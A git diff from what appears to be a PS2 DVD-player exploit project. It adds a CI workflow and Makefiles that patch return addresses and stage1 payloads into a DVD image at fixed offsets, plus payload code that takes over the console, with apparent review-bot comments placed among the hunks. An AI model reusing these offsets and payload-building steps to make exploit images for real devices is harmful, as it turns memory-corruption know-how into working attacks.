diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..52e0bc7 --- /dev/null +++ b/.clang-format 
@@ -0,0 +1,116 @@ +--- +Language: Cpp +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: true +AlignConsecutiveBitFields: AcrossEmptyLinesAndComments +AlignConsecutiveDeclarations: false +AlignConsecutiveMacros: AcrossComments +AlignEscapedNewlines: Left +AlignOperands: Align +AlignTrailingComments: true +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: true +AllowAllParametersOfDeclarationOnNextLine: true +AllowShortBlocksOnASingleLine: Empty +AllowShortCaseLabelsOnASingleLine: false +AllowShortEnumsOnASingleLine: true +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Never +AllowShortLambdasOnASingleLine: Empty +AllowShortLoopsOnASingleLine: false +AlwaysBreakAfterReturnType: None +AlwaysBreakBeforeMultilineStrings: false +AlwaysBreakTemplateDeclarations: true +BinPackArguments: true +BinPackParameters: true +BitFieldColonSpacing : Both +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: true + AfterControlStatement: false + AfterEnum: false + AfterFunction: true + AfterNamespace: true + AfterObjCDeclaration: false + AfterStruct: true + AfterUnion: true + AfterExternBlock: false + BeforeCatch: false + BeforeElse: false + BeforeLambdaBody: false + BeforeWhile: false + IndentBraces: false + SplitEmptyFunction: true + SplitEmptyRecord: true + SplitEmptyNamespace: true +BreakBeforeBinaryOperators: None +BreakBeforeConceptDeclarations: true +BreakBeforeTernaryOperators: false +BreakConstructorInitializers: BeforeComma +BreakStringLiterals: true +ColumnLimit: 0 +CommentPragmas: '^ (IWYU pragma:|NOLINT)' +ConstructorInitializerAllOnOneLineOrOnePerLine: false +ConstructorInitializerIndentWidth: 4 +ContinuationIndentWidth: 4 +Cpp11BracedListStyle: true +DeriveLineEnding: true +DerivePointerAlignment: false +DisableFormat: false +EmptyLineBeforeAccessModifier: LogicalBlock +FixNamespaceComments: true +ForEachMacros: [] +IncludeBlocks: Preserve 
+IndentExternBlock: NoIndent +IndentCaseBlocks: false +IndentCaseLabels: true +IndentGotoLabels: true +IndentWidth: 4 +IndentWrappedFunctionNames: false +KeepEmptyLinesAtTheStartOfBlocks: true +MacroBlockBegin: '' +MacroBlockEnd: '' +MaxEmptyLinesToKeep: 3 +NamespaceIndentation: None +ObjCBlockIndentWidth: 2 +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PenaltyBreakAssignment: 80 +PenaltyBreakBeforeFirstCallParameter: 19 +PenaltyBreakComment: 300 +PenaltyBreakFirstLessLess: 120 +PenaltyBreakString: 1000 +PenaltyBreakTemplateDeclaration: 80 +PenaltyExcessCharacter: 1000000 +PenaltyIndentedWhitespace: 80 +PenaltyReturnTypeOnItsOwnLine: 60 +PointerAlignment: Right +# uncomment below when clang >13 will be out +# IndentPPDirectives: AfterHash +# PPIndentWidth: 1 +ReflowComments: true +SortIncludes: false +SpaceAfterCStyleCast: false +SpaceAfterLogicalNot: false +SpaceAroundPointerQualifiers: Default +SpaceBeforeAssignmentOperators: true +SpaceBeforeCaseColon: false +SpaceBeforeCpp11BracedList: true +SpaceBeforeInheritanceColon: false +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceBeforeSquareBrackets: false +SpaceInEmptyBlock: false +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInConditionalStatement: false +SpacesInContainerLiterals: true +SpacesInCStyleCastParentheses: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +Standard: Cpp11 +TabWidth: 4 +UseTab: Never diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000..d3cb9a0 --- /dev/null +++ b/.editorconfig 
@@ -0,0 +1,25 @@
+# EditorConfig: http://EditorConfig.org
+
+# Top-most EditorConfig file
+root = true
+
+# Unix-style newlines with a newline ending every file
+[*]
+end_of_line = lf
+insert_final_newline = true
+trim_trailing_whitespace = true
+charset = utf-8
+
+# 4 space indentation
+[*.{c,h,js,css,html}]
+indent_style = space
+indent_size = 4
+
+# 2 space indentation
+[*.{json,xml,yaml,yml}]
+indent_style = space
+indent_size = 2
+
+# Tab indentation
+[Makefile*]
+indent_style = tab
diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..1dc9955
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,17 @@
+# Auto detect text files and perform LF normalization
+* text=auto
+
+# Custom for Visual Studio
+*.cs diff=csharp
+
+# Standard to msysgit
+*.doc diff=astextplain
+*.DOC diff=astextplain
+*.docx diff=astextplain
+*.DOCX diff=astextplain
+*.dot diff=astextplain
+*.DOT diff=astextplain
+*.pdf diff=astextplain
+*.PDF diff=astextplain
+*.rtf diff=astextplain
+*.RTF diff=astextplain
diff --git a/.github/workflows/compilation.yml b/.github/workflows/compilation.yml
new file mode 100644
index 0000000..824a006
--- /dev/null
+++ b/.github/workflows/compilation.yml
@@ -0,0 +1,106 @@ +name: CI-compile + +on: + push: + pull_request: + +jobs: + build: + name: Payload compilation + runs-on: ubuntu-latest + container: ps2dev/ps2dev:v1.0 + # instead of "ps2dev/ps2dev:latest" you can use different tags, for example for old projects you can use "ps2dev/ps2dev:v1.0" + steps: + - name: Install dependencies + run: | + apk add build-base git zip grep cdrkit bash + + - uses: actions/checkout@v2 + - run: | + git fetch --prune --unshallow + + - name: Get short SHA and repository name + id: slug + run: | + echo "::set-output name=sha8::$(echo ${GITHUB_SHA} | cut -c1-8)" + echo "::set-output name=REPOSITORY_NAME::$(echo "$GITHUB_REPOSITORY" | awk -F / '{print $2}' | sed -e "s/:refs//")" + + - name: Compile payload >=3.03 + shell: bash + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/3.03-3.11" + ls -l + ./build.sh + ls -l + md5sum *.bin + + - name: Upload artifacts >=3.03 + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_303-311_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/3.03-3.11 + + - name: Compile payload <2.13 + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/1.00-2.13" + make -B -f hardware.mk + ls -l + md5sum *.bin + + - name: Upload artifacts <2.13 + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_110-213_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/1.00-2.13 + + - name: Compile payload <2.13 (PCSX2 version) + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/1.00-2.13" + make -B -f emulator.mk + ls -l + md5sum *.bin + + - name: Upload artifacts <2.13 (PCSX2 version) + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_110-213_PCSX2_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/1.00-2.13 + !PAYLOADS/1.00-2.13/dvd.iso.bin + + - run: | + mv 
PAYLOADS/3.03-3.11/exploit.iso FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.iso
+ zip FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.iso
+ mv PAYLOADS/1.00-2.13/dvd.iso FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.iso
+ zip FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.iso
+ mv PAYLOADS/1.00-2.13/dvd_pcsx2.iso FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.iso
+ zip FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.iso
+
+ - name: Create pre-release
+ if: github.ref == 'refs/heads/master'
+ uses: marvinpinto/action-automatic-releases@latest
+ with:
+ repo_token: "${{ secrets.GITHUB_TOKEN }}"
+ prerelease: true
+ automatic_release_tag: "latest"
+ title: "Development build"
+ files: |
+ *.zip
+
+ - name: Create Tagged Release Draft
+ if: startsWith(github.ref, 'refs/tags/v')
+ uses: marvinpinto/action-automatic-releases@latest
+ with:
+ repo_token: "${{ secrets.GITHUB_TOKEN }}"
+ prerelease: false
+ draft: true
+ files: |
+ *.zip
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4e78420
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,39 @@
+#
+# NOTE! Please use 'git ls-files -i --exclude-standard -c'
+# command after changing this file, to see if there are
+# any tracked files which get ignored after the change.
+#
+# Normal rules
+#
+.*
+*.a
+*.diff
+*.elf
+*.ELF
+*.erl
+*.exe
+*.irx
+*.map
+*.o
+*.patch
+*.rej
+*.zip
+*.ZIP
+*.a
+
+#
+# files that we don't want to ignore
+#
+!.gitignore
+!.gitattributes
+!.github
+!.editorconfig
+!.clang-format
+
+!BOOT.ELF
+
+#
+# Generated source files
+#
+*.bin
+dvd.iso
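Review bot: Both release steps hand `repo_token: "${{ secrets.GITHUB_TOKEN }}"` to `marvinpinto/action-automatic-releases@latest`, a third-party action referenced by a mutable tag, so whoever controls that tag can run arbitrary code with a token able to publish releases for this repository; pin it to a full commit SHA (and `actions/checkout@v2` / `actions/upload-artifact@v2` likewise), e.g. `uses: marvinpinto/action-automatic-releases@<full commit sha> # vX.Y.Z`. The file also declares no `permissions:` block, so the token carries whatever the repository default grants on every push and pull request rather than only what the two release steps need; a top-level `permissions:` with `contents: write` and nothing else keeps it scoped. The `ps2dev/ps2dev:v1.0` container is the toolchain that produces the shipped payloads and is pinned by tag only, so a digest pin (`ps2dev/ps2dev@sha256:…`) would make the released artifacts reproducible. Finally, `echo "::set-output name=…"` is the older output syntax that GitHub has since deprecated in favour of appending to `$GITHUB_OUTPUT`, worth updating while the file is new.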
diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO b/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO
deleted file mode 100644
index d97fe69..0000000
Binary files a/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO and /dev/null differ
diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO b/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO
deleted file mode 100644
index d9f7983..0000000
Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO and /dev/null differ
diff --git a/PAYLOADS/1.00-2.13/Mainrules.mk b/PAYLOADS/1.00-2.13/Mainrules.mk
index 687a3e7..748d779 100644
--- a/PAYLOADS/1.00-2.13/Mainrules.mk
+++ b/PAYLOADS/1.00-2.13/Mainrules.mk
@@ -1,50 +1,62 @@
-EE_CC = ee-gcc
-EE_LD = ee-ld
-EE_AS = ee-as
-EE_OBJCOPY = ee-objcopy
-
-IOP_CC = iop-gcc
-IOP_LD = iop-ld
-IOP_AS = iop-as
+EE_CC = ee-gcc
+EE_LD = ee-ld
+EE_AS = ee-as
+EE_OBJCOPY = ee-objcopy
+
+IOP_CC = iop-gcc
+IOP_LD = iop-ld
+IOP_AS = iop-as
 IOP_OBJCOPY = iop-objcopy
 IOP_OBJDUMP = iop-objdump
 IOP_SYMBOLS = -DREAD_SECTORS_210=$(IOP_READ_SECTORS_210) -DORIGINAL_RETURN_ADDRESS_210=$(IOP_ORIGINAL_RETURN_ADDRESS_210) -DRETURN_ADDRESS_LOCATION_210=$(IOP_RETURN_ADDRESS_LOCATION_210) \
- -DREAD_SECTORS_212=$(IOP_READ_SECTORS_212) -DORIGINAL_RETURN_ADDRESS_212=$(IOP_ORIGINAL_RETURN_ADDRESS_212) -DRETURN_ADDRESS_LOCATION_212=$(IOP_RETURN_ADDRESS_LOCATION_212) \
- -DREAD_SECTORS_213=$(IOP_READ_SECTORS_213) -DORIGINAL_RETURN_ADDRESS_213=$(IOP_ORIGINAL_RETURN_ADDRESS_213) -DRETURN_ADDRESS_LOCATION_213=$(IOP_RETURN_ADDRESS_LOCATION_213) \
- -DREAD_SECTORS_110=$(IOP_READ_SECTORS_110) -DORIGINAL_RETURN_ADDRESS_110=$(IOP_ORIGINAL_RETURN_ADDRESS_110) -DRETURN_ADDRESS_LOCATION_110=$(IOP_RETURN_ADDRESS_LOCATION_110)
+ -DREAD_SECTORS_212=$(IOP_READ_SECTORS_212) -DORIGINAL_RETURN_ADDRESS_212=$(IOP_ORIGINAL_RETURN_ADDRESS_212) -DRETURN_ADDRESS_LOCATION_212=$(IOP_RETURN_ADDRESS_LOCATION_212) \
+ -DREAD_SECTORS_213=$(IOP_READ_SECTORS_213) -DORIGINAL_RETURN_ADDRESS_213=$(IOP_ORIGINAL_RETURN_ADDRESS_213) -DRETURN_ADDRESS_LOCATION_213=$(IOP_RETURN_ADDRESS_LOCATION_213) \
+ -DREAD_SECTORS_110=$(IOP_READ_SECTORS_110) -DORIGINAL_RETURN_ADDRESS_110=$(IOP_ORIGINAL_RETURN_ADDRESS_110) -DRETURN_ADDRESS_LOCATION_110=$(IOP_RETURN_ADDRESS_LOCATION_110)
 IOP_CFLAGS = -O2 -G 0 -nostartfiles -nostdlib -ffreestanding -g $(IOP_SYMBOLS)
 EE_CFLAGS = -O2 -G 0 -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1
 IOP_STAGE1_SIZE_210_212 = `stat -c '%s' stage1_210_212.iop.bin`
-IOP_STAGE1_SIZE_213 = `stat -c '%s' stage1_213.iop.bin`
-IOP_PAYLOAD_SIZE = `stat -c '%s' ioppayload.iop.bin`
-
-dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin
- #genisoimage -udf -o dvd.iso udf/
- # @echo Insert 0x00000048 to offset 0x0818AC in dvd.iso
- # @echo Insert 0x00004000 to offset 0x0818B0 in dvd.iso
- # @echo Insert 0x000B7548 to offset 0x0818F4 in dvd.iso
-
- # For now it's easier to just use a base dvd rather than attempting to generate an image and patch it
- cp dvd.base.iso dvd.iso
-
- # Return address (2.10 - 2.13) 0x00818f4 = 530676
- printf $(STAGE1_LOAD_ADDRESS_STRING_210_212) | dd of=dvd.iso bs=1 seek=530676 count=4 conv=notrunc
-
- # Return address 1.10 (0x000818bc = 530620)
- printf $(STAGE1_LOAD_ADDRESS_STRING_110) | dd of=dvd.iso bs=1 seek=530620 count=4 conv=notrunc
+IOP_STAGE1_SIZE_213 = `stat -c '%s' stage1_213.iop.bin`
+IOP_PAYLOAD_SIZE = `stat -c '%s' ioppayload.iop.bin`
+
+# dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin
+dvd.iso: stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin
+ mkdir -p udf/AUDIO_TS
+ genisoimage -udf -dvd-video -o $(ISO_NAME) udf/
+ # mkisofs -UDF -o $(ISO_NAME) udf # Mac OS command
+
+ # @echo Insert 0x00000048 to offset 0x00818AC = 530604 in dvd.iso
+ # @echo Insert 0x00004000 to offset 0x00818B0 = 530608 in dvd.iso
+ # @echo next one for pcsx2 version
+ # @echo Insert 0x000B7548 to offset 0x00818F4 = 530676 in dvd.iso
+ # TODO: probably this step is repeated twice, remove one step
+ # TODO: check why seek=$((0x00818AC)) is failing
+ # TODO: AKUHAK: what does TEMP1, TEMP2 stands for ??
+ printf $(TEMP1) | dd of=$(ISO_NAME) bs=1 seek=530604 count=4 conv=notrunc
+ printf $(TEMP2) | dd of=$(ISO_NAME) bs=1 seek=530608 count=4 conv=notrunc
+ printf $(TEMP3) | dd of=$(ISO_NAME) bs=1 seek=530676 count=4 conv=notrunc
+
+ # Cturt: For now it's easier to just use a base dvd rather than attempting to generate an image and patch it
+ # cp dvd.base.iso dvd.iso
+
+ # Return address (2.10 - 2.13) 0x00818F4 = 530676
+ printf $(STAGE1_LOAD_ADDRESS_STRING_210_212) | dd of=$(ISO_NAME) bs=1 seek=530676 count=4 conv=notrunc
+
+ # Return address 1.10 (0x000818BC = 530620)
+ printf $(STAGE1_LOAD_ADDRESS_STRING_110) | dd of=$(ISO_NAME) bs=1 seek=530620 count=4 conv=notrunc
 # Old toolchains don't support this option, so just copy byte-by-byte...
 # bs=4096 iflag=skip_bytes,count_bytes
-
- dd if=stage1_210_212.iop.bin of=dvd.iso bs=1 seek=$(STAGE1_ISO_210_212) count=$(IOP_STAGE1_SIZE_210_212) conv=notrunc
- dd if=stage1_213.iop.bin of=dvd.iso bs=1 seek=$(STAGE1_ISO_213) count=$(IOP_STAGE1_SIZE_213) conv=notrunc
-
+ # AKuHAK: what does above means? Do we need relative offsets?
+
+ dd if=stage1_210_212.iop.bin of=$(ISO_NAME) bs=1 seek=$(STAGE1_ISO_210_212) count=$(IOP_STAGE1_SIZE_210_212) conv=notrunc
+ dd if=stage1_213.iop.bin of=$(ISO_NAME) bs=1 seek=$(STAGE1_ISO_213) count=$(IOP_STAGE1_SIZE_213) conv=notrunc
+ # 0x700000 = 7340032
- dd if=ioppayload.iop.bin of=dvd.iso bs=1 seek=7340032 count=$(IOP_PAYLOAD_SIZE) conv=notrunc
+ dd if=ioppayload.iop.bin of=$(ISO_NAME) bs=1 seek=7340032 count=$(IOP_PAYLOAD_SIZE) conv=notrunc
 %.iop.bin: %.iop.elf
 $(IOP_OBJCOPY) -O binary $< $@
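Review bot: The `printf $(TEMP3) | dd … seek=530676` write is dead: the recipe overwrites the same four bytes a few lines later with `printf $(STAGE1_LOAD_ADDRESS_STRING_210_212) | dd … seek=530676`, and in both `hardware.mk` and `emulator.mk` the two strings differ (`'\x48\x75\x0B\x00'` vs `'\x48\x2c\x06\xa0'` / `'\x48\x75\x0b\xa0'`), so this is the duplication the TODO suspects and the TEMP3 line should be dropped rather than left to mislead the next reader. More important, every patch goes to a hard-coded byte offset in an image that `genisoimage` has just laid out from whatever is in `udf/`, and nothing checks that those offsets still fall inside `VIDEO_TS.IFO`; if the directory contents change, the build silently corrupts unrelated bytes and ships an ISO that does nothing. Locating the IFO's extent with `isoinfo -l -i $(ISO_NAME)` and failing the recipe when `530604` lies outside it would catch that at build time. On the `seek=$((0x00818AC))` TODO: make expands `$(` itself, so the shell never sees the arithmetic; in a recipe it has to be written `seek=$$((0x00818AC))` (and the recipe shell must accept hex constants, which bash does).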
@@ -54,16 +66,17 @@ dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.b
 stage1_210_212.iop.elf: stage1_210_212.iop.S ioppayload.iop.bin
 $(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"
+ # $(echo 0x"$IOP_PAYLOAD_ENTRY" | awk '{print $1}')
 $(IOP_CC) $< -DENTRY=$(IOP_PAYLOAD_ENTRY) -DIOP_PAYLOAD_SIZE=$(IOP_PAYLOAD_SIZE) $(IOP_CFLAGS) -o $@
 stage1_213.iop.elf: stage1_213.iop.S ioppayload.iop.bin
 $(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"
+ # $(echo 0x"$IOP_PAYLOAD_ENTRY" | awk '{print $1}')
 $(IOP_CC) $< -DENTRY=$(IOP_PAYLOAD_ENTRY) -DIOP_PAYLOAD_SIZE=$(IOP_PAYLOAD_SIZE) $(IOP_CFLAGS) -o $@
 %.iop.elf: %.iop.c eepayload.ee.bin
 $(IOP_CC) -Ttext=$(IOP_PAYLOAD_ADDRESS) -DLOAD_ELF_FROM_OFFSET=$(LOAD_ELF_FROM_OFFSET) ioppayload.iop.c $(IOP_CFLAGS) -o $@
-
 %.ee.bin: %.ee.elf
 $(EE_OBJCOPY) -O binary $< $@ -Wl,-z,max-page-size=0x1
@@ -74,4 +87,4 @@ eepayload.ee.elf: eecrt0.ee.o syscalls.ee.o eepayload.ee.c
 $(EE_CC) -Ttext=$(EE_PAYLOAD_ADDRESS) $^ $(EE_CFLAGS) -o $@
 clean:
- rm -rf *.elf *.bin *.o dvd.iso
+ rm -rf *.iop.elf *.ee.elf *.bin *.o $(ISO_NAME)
diff --git a/PAYLOADS/1.00-2.13/dvd.base.iso b/PAYLOADS/1.00-2.13/dvd.base.iso
deleted file mode 100644
index 41540dd..0000000
Binary files a/PAYLOADS/1.00-2.13/dvd.base.iso and /dev/null differ
diff --git a/PAYLOADS/1.00-2.13/eecrt0.ee.S b/PAYLOADS/1.00-2.13/eecrt0.ee.S
index 9e4d82f..b690f26 100644
--- a/PAYLOADS/1.00-2.13/eecrt0.ee.S
+++ b/PAYLOADS/1.00-2.13/eecrt0.ee.S
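Review bot: The added recipe line `# $(echo 0x"$IOP_PAYLOAD_ENTRY" | awk '{print $1}')` is expanded by make before the shell sees it — `$(echo …)`, `$I` and `$1` are all make references — so it collapses to an empty comment and documents nothing; if it is a shell command kept for later it needs `$$(…)`, `$$IOP_PAYLOAD_ENTRY` and `$$1`. The underlying gap in both `stage1_*.iop.elf` rules is that the `$(IOP_OBJDUMP) … | grep " _start"` step only prints the real entry point while `-DENTRY=$(IOP_PAYLOAD_ENTRY)` still bakes in the value hard-coded in the `.mk` files, so if the two drift the stage1 stub jumps to the wrong address with no build-time signal. Once the discrepancy noted in `hardware.mk` (`401fa178` vs `A00FD178`) is understood, that print could become an assertion along the lines of `test "$$($(IOP_OBJDUMP) -t ioppayload.iop.elf | awk '/ _start$$/ {print toupper($$1)}')" = "$(patsubst 0x%,%,$(IOP_PAYLOAD_ENTRY))"` so the build fails instead of producing a broken payload.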
@@ -4,22 +4,22 @@
 .global _start
 _start:
- # Point stack to end of scratchpad RAM
- #la $sp, 0x70004000
+ # Point stack to end of scratchpad RAM
+ # la $sp, 0x70004000
 .global main
- #la $v1, 0x01
- #la $a0, 0x7f
- #syscall 0x01 # ResetEE
-
- la $a0, main
- la $a1, 0
- la $a2, 0
- la $a3, 0
+ # la $v1, 0x01
+ # la $a0, 0x7f
+ # syscall 0x01 # ResetEE
- jr $a0
+ la $a0, main
+ la $a1, 0
+ la $a2, 0
+ la $a3, 0
+
+ jr $a0
 # Don't use on phat PS2... completely broken syscall
 #ExecPS2:
-# la $v1, 0x07
-# syscall 0x07 # ExecPS2
+# la $v1, 0x07
+# syscall 0x07 # ExecPS2
diff --git a/PAYLOADS/1.00-2.13/eepayload.ee.c b/PAYLOADS/1.00-2.13/eepayload.ee.c
index 26f227a..eeb529a 100644
--- a/PAYLOADS/1.00-2.13/eepayload.ee.c
+++ b/PAYLOADS/1.00-2.13/eepayload.ee.c
@@ -1,67 +1,73 @@
 // ElReino & CTurt 2020
-//int (*SifIopReset)(char *, int) = (void *)0x85360;
-//void (*SifInitRpc)(int) = (void *)0x84500;
-//void (*SifExitRpc)(void) = (void *)0x84690;
+// int (*SifIopReset)(char *, int) = (void *)0x85360;
+// void (*SifInitRpc)(int) = (void *)0x84500;
+// void (*SifExitRpc)(void) = (void *)0x84690;
 extern void SifWriteBackDCache(void *ptr, int size);
 extern int SifSetReg(unsigned int register_num, unsigned int register_value);
 extern int SifGetReg(unsigned int register_num);
-static int SifIopSync(void) {
- #define SIF_REG_SMFLAG 4
- #define SIF_STAT_BOOTEND 0x40000
- return((SifGetReg(SIF_REG_SMFLAG) & SIF_STAT_BOOTEND) != 0);
+static int SifIopSync(void)
+{
+#define SIF_REG_SMFLAG 4
+#define SIF_STAT_BOOTEND 0x40000
+ return ((SifGetReg(SIF_REG_SMFLAG) & SIF_STAT_BOOTEND) != 0);
 }
-static void flush(void) {
- asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback
- asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate
+static void flush(void)
+{
+ asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback
+ asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate
 }
- int GetThreadId(void);
+int GetThreadId(void);
 void ChangeThreadPriority(int thread_id, int priority);
 int CancelWakeupThread(int thread_id);
 void TerminateThread(int thread_id);
 void DeleteThread(int thread_id);
-static void TerminateAllThreads(void) {
+static void TerminateAllThreads(void)
+{
 int i, ThreadID;
- ThreadID=GetThreadId();
+ ThreadID = GetThreadId();
 ChangeThreadPriority(ThreadID, 0);
 CancelWakeupThread(ThreadID);
- for(i=1; i<256; i++){ //Skip idle thread.
- if(i!=ThreadID){
+ for (i = 1; i < 256; i++) { // Skip idle thread.
+ if (i != ThreadID) {
 TerminateThread(i);
 DeleteThread(i);
 }
 }
 }
-int main(void) {
- // ExecPS2 is broken on Phat PS2... manually kill other threads instead
- TerminateAllThreads();
+int main(void)
+{
+ // ExecPS2 is broken on Phat PS2... manually kill other threads instead
+ TerminateAllThreads();
- // Signal IOP that EE is Ready, willing, and fully enabled!
- SifSetReg(3, 1);
+ // Signal IOP that EE is Ready, willing, and fully enabled!
+ SifSetReg(3, 1);
- volatile int *waitAddress = (void *)0x21FFF7F0;
- while(!*waitAddress);
+ volatile int *waitAddress = (void *)0x21FFF7F0;
+ while (!*waitAddress)
+ ;
- volatile void **entry_point_address = (void *)0x01FFF7E0;
+ volatile void **entry_point_address = (void *)0x01FFF7E0;
- // cdrom0:
- volatile void **argument = (void *)0x01FFF7D0;
- *(volatile int *)0x01FFF7D0 = 0x01FFF7D8;
- *(volatile int *)0x01FFF7D8 = 0x6F726463;
- *(volatile int *)0x01FFF7DC = 0x003A306D;
+ // cdrom0:
+ volatile void **argument = (void *)0x01FFF7D0;
+ *(volatile int *)0x01FFF7D0 = 0x01FFF7D8;
+ *(volatile int *)0x01FFF7D8 = 0x6F726463;
+ *(volatile int *)0x01FFF7DC = 0x003A306D;
- flush();
-
- //SifIopReset("rom0:UDNL rom0:EELOADCNF", 0);
- //while(!SifIopSync());
+ flush();
- //ExecPS2(*entry_point_address, 0, 0, 0);
- ExecPS2(*entry_point_address, 0, 1, argument); // kHn: arg == cdrom0:
+ // SifIopReset("rom0:UDNL rom0:EELOADCNF", 0);
+ // while (!SifIopSync())
+ // ;
+
+ // ExecPS2(*entry_point_address, 0, 0, 0);
+ ExecPS2(*entry_point_address, 0, 1, argument); // kHn: arg == cdrom0:
 }
diff --git a/PAYLOADS/1.00-2.13/emulator.mk b/PAYLOADS/1.00-2.13/emulator.mk
index 8252377..9e4c6e8 100644
--- a/PAYLOADS/1.00-2.13/emulator.mk
+++ b/PAYLOADS/1.00-2.13/emulator.mk
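Review bot: `ExecPS2(*entry_point_address, 0, 1, argument)` is the only external call in this file with no prototype — `SifSetReg`, `SifGetReg`, `GetThreadId`, `TerminateThread` and the others are all declared above — so it relies on an implicit `int ExecPS2()` declaration that checks none of the arguments and that newer GCC versions reject by default. Adding a declaration next to the others, e.g. `extern void *ExecPS2(void *entry, void *gp, int argc, void *argv);` (types to be confirmed against the EE kernel's definition of the syscall), makes the call checked and keeps the file building on current toolchains. A comment on the three stores at `0x01FFF7D0`–`0x01FFF7DC` would also help: `0x6F726463` and `0x003A306D` are the little-endian bytes of `"cdro"` and `"m0:\0"`, and `0x01FFF7D0` holds a pointer to that string, i.e. a one-element argv, which the bare `// cdrom0:` label only hints at.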
@@ -1,37 +1,45 @@
-#STAGE1_LOAD_ADDRESS_110 = 0xa00b66a8
-#STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x66\x0b\xa0'
+# TODO: try to run original DVD players in the pcsx2 (with balika's magicgate support), not the krHACKen ones
+TEMP1 = '\x48\x00\x00\x00'
+TEMP2 = '\x00\x40\x00\x00'
+TEMP3 = '\x48\x75\x0B\x00'
-STAGE1_LOAD_ADDRESS_210_212 = 0xa00b7548
+ISO_NAME = dvd_pcsx2.iso
+
+STAGE1_LOAD_ADDRESS_110 = 0xA00B66A8
+STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x66\x0b\xa0'
+
+STAGE1_LOAD_ADDRESS_210_212 = 0xA00B7548
 STAGE1_LOAD_ADDRESS_STRING_210_212 = '\x48\x75\x0b\xa0'
-STAGE1_LOAD_ADDRESS_213 = 0xa00b6fc8
+STAGE1_LOAD_ADDRESS_213 = 0xA00B6FC8
 STAGE1_LOAD_ADDRESS_STRING_213 = '\xc8\x6f\x0b\xa0'
-STAGE1_ISO_210_212 = 532728 # 0x820f8
-STAGE1_ISO_213 = 534136 # 0x82678
+STAGE1_ISO_210_212 = 532728 # 0x820F8
+STAGE1_ISO_213 = 534136 # 0x82678
-IOP_READ_SECTORS_110 = 0xb19e4
-IOP_READ_SECTORS_210 = 0xb260c
-IOP_READ_SECTORS_212 = 0xb25f8
-IOP_READ_SECTORS_213 = 0xb21f8
-IOP_ORIGINAL_RETURN_ADDRESS_210 = 0xb3630
+IOP_READ_SECTORS_110 = 0xB19E4
+IOP_READ_SECTORS_210 = 0xB260C
+IOP_READ_SECTORS_212 = 0xB25F8
+IOP_READ_SECTORS_213 = 0xB21F8
+IOP_ORIGINAL_RETURN_ADDRESS_210 = 0xB3630
 IOP_ORIGINAL_RETURN_ADDRESS_212 = 0xB35D8
 IOP_ORIGINAL_RETURN_ADDRESS_213 = 0xB31EC
-IOP_RETURN_ADDRESS_LOCATION_210 = 0x1f62ac
-IOP_RETURN_ADDRESS_LOCATION_212 = 0x1f62b4
+IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F62AC
